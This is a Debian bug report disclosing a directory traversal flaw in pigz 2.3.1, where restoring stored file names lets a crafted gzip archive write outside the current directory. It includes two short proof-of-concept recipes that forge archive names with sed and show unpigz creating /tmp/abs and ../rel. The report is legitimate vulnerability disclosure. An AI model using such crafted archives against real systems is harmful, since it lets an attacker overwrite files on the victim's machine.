Package: pigz
Version: 2.3.1-1
Tags: security
pigz is susceptible to directory traversal vulnerabilities. While
decompressing a file with restoring file name, it (unlike gzip) will
happily use absolute and relative paths taken from the input. This can
be exploited by a malicious archive to write files outside the current
directory.
1. Absolute path.
A sample could be prepared in following way:
$ touch XtmpXabs
$ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
$ rm XtmpXabs
Then check it works:
$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory
$ unpigz -N abs.gz
$ ls /tmp/abs
/tmp/abs
2. Relative path with "..".
A sample could be prepared in following way:
$ rm ../rel
$ touch XXXrel
$ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
$ rm XXXrel
Then check it works:
$ ls ../rel
ls: cannot access ../rel: No such file or directory
$ unpigz -N rel.gz
$ ls ../rel
../rel
--
Alexander Cherepanov
--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
